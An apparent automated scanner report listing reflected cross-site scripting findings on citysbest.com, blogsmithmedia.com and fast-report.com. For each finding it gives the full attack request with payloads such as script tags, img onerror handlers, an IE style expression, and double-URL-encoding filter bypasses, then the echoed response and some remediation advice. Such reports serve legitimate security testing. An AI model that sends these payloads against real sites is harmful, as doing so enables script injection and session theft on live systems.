GET /www.citysbest.com/include1ab3c"><script>alert(1)</script>489e273b4e5/background.js?9 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Length: 17459 Content-Type: text/html Expires: Sat, 26 Mar 2011 20:36:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 26 Mar 2011 20:36:25 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/include1ab3c"><script>alert(1)</script>489e273b4e5/background.js?9"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f2a6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6285eeee8c was submitted in the REST URL parameter 3. This input was echoed as 3f2a6</script><script>alert(1)</script>c6285eeee8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/include/background.js3f2a6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6285eeee8c?9 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Length: 17390 Content-Type: text/html Expires: Sat, 26 Mar 2011 20:36:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 26 Mar 2011 20:36:45 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... "+pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806f6"><script>alert(1)</script>d9a439bdd79 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/include/background.js806f6"><script>alert(1)</script>d9a439bdd79?9 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Length: 17175 Content-Type: text/html Expires: Sat, 26 Mar 2011 20:36:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 26 Mar 2011 20:36:43 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/include/background.js806f6"><script>alert(1)</script>d9a439bdd79?9"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8037%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e465808f0b34 was submitted in the REST URL parameter 2. This input was echoed as d8037</script><script>alert(1)</script>465808f0b34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/included8037%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e465808f0b34/citysbest-min.js?29 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Length: 17836 Content-Type: text/html Expires: Sat, 26 Mar 2011 20:36:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 26 Mar 2011 20:36:37 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... 5.pfxID="acg"; s_265.pageName=s_265.pfxID+" : "+pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464e5"><script>alert(1)</script>58128cfd51f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/include464e5"><script>alert(1)</script>58128cfd51f/citysbest-min.js?29 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Length: 17474 Content-Type: text/html Expires: Sat, 26 Mar 2011 20:36:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 26 Mar 2011 20:36:24 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/include464e5"><script>alert(1)</script>58128cfd51f/citysbest-min.js?29"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31cbd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e77e4b54285b was submitted in the REST URL parameter 3. This input was echoed as 31cbd</script><script>alert(1)</script>77e4b54285b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/include/citysbest-min.js31cbd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e77e4b54285b?29 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Length: 17410 Content-Type: text/html Expires: Sat, 26 Mar 2011 20:36:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 26 Mar 2011 20:36:46 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdafe"><script>alert(1)</script>f56c1613a2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/include/citysbest-min.jscdafe"><script>alert(1)</script>f56c1613a2b?29 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Length: 17196 Content-Type: text/html Expires: Sat, 26 Mar 2011 20:36:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 26 Mar 2011 20:36:43 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/include/citysbest-min.jscdafe"><script>alert(1)</script>f56c1613a2b?29"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc64"><script>alert(1)</script>1a393b12c55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediaacc64"><script>alert(1)</script>1a393b12c55/citysbest-min.css?58 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ea01%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71724f793f was submitted in the REST URL parameter 1. This input was echoed as 3ea01</script><script>alert(1)</script>71724f793f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /media3ea01%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71724f793f/citysbest-min.css?58 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4250"><script>alert(1)</script>9381a402f46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/citysbest-min.cssf4250"><script>alert(1)</script>9381a402f46?58 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af55b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29e0ad3a2 was submitted in the REST URL parameter 2. This input was echoed as af55b</script><script>alert(1)</script>e29e0ad3a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /media/citysbest-min.cssaf55b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29e0ad3a2?58 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebc31"><script>alert(1)</script>9a5275880b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trafficebc31"><script>alert(1)</script>9a5275880b0/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=1081493718 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d03%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c9e0bcf83e was submitted in the REST URL parameter 1. This input was echoed as 55d03</script><script>alert(1)</script>9c9e0bcf83e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /traffic55d03%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c9e0bcf83e/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=1081493718 HTTP/1.1 Host: www.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the goto request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3f0b1'style%3d'x%3aexpression(alert(1))'8b36f925f23 was submitted in the goto parameter. This input was echoed as 3f0b1'style='x:expression(alert(1))'8b36f925f23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /bitrix/redirect.php?event1=shareit_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=3f0b1'style%3d'x%3aexpression(alert(1))'8b36f925f23 HTTP/1.1 Host: www.fast-report.com Proxy-Connection: keep-alive Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A45
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 16:34:45 GMT Server: Apache X-Powered-By: PHP/5.3.3 Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 16:34:46 GMT P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA" X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:34:50 GMT; path=/ Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A34%3A50; expires=Tue, 20-Mar-2012 16:34:50 GMT; path=/ Vary: Accept-Encoding Content-Type: text/html; charset=windows-1251 Content-Length: 38534
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18& ...[SNIP]... <input type='hidden' name='backurl' value='/bitrix/3f0b1'style='x:expression(alert(1))'8b36f925f23'> ...[SNIP]...
The value of the goto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e9fb"><script>alert(1)</script>ec45f26fc89 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bitrix/redirect2.php?event1=avangate_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3D%23EVENT_GID%238e9fb"><script>alert(1)</script>ec45f26fc89 HTTP/1.1 Host: www.fast-report.com Proxy-Connection: keep-alive Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A38
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 16:32:29 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Powered-By: PHP/5.3.3 P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA" X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251) Pragma: no-cache Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:32:33 GMT; path=/ Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A32%3A33; expires=Tue, 20-Mar-2012 16:32:33 GMT; path=/ Vary: Accept-Encoding Content-Type: text/html; charset=windows-1251 Content-Length: 406
5.77. http://www.fast-report.com/bitrix/redirect2.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fast-report.com
Path:
/bitrix/redirect2.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c05f1"><script>alert(1)</script>c0e1758ffb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bitrix/redirect2.php?event1=avangate_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3D%23EVENT_GI/c05f1"><script>alert(1)</script>c0e1758ffb3D%23 HTTP/1.1 Host: www.fast-report.com Proxy-Connection: keep-alive Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A38
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 16:32:37 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Powered-By: PHP/5.3.3 P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA" X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251) Pragma: no-cache Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:32:41 GMT; path=/ Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A32%3A41; expires=Tue, 20-Mar-2012 16:32:41 GMT; path=/ Vary: Accept-Encoding Content-Type: text/html; charset=windows-1251 Content-Length: 376
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e5209<script>alert(1)</script>5ce65e42038 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the gn request parameter is copied into the HTML document as plain text between tags. The payload 10a73<img%20src%3da%20onerror%3dalert(1)>afed2c094bf was submitted in the gn parameter. This input was echoed as 10a73<img src=a onerror=alert(1)>afed2c094bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the sn request parameter is copied into the HTML document as plain text between tags. The payload d63f1<img%20src%3da%20onerror%3dalert(1)>fdda9b0981e was submitted in the sn parameter. This input was echoed as d63f1<img src=a onerror=alert(1)>fdda9b0981e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the vertical request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351ba"%3balert(1)//b9d3a987aa3 was submitted in the vertical parameter. This input was echoed as 351ba";alert(1)//b9d3a987aa3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the iusrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dd63"><script>alert(1)</script>53698cadc19 was submitted in the iusrc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
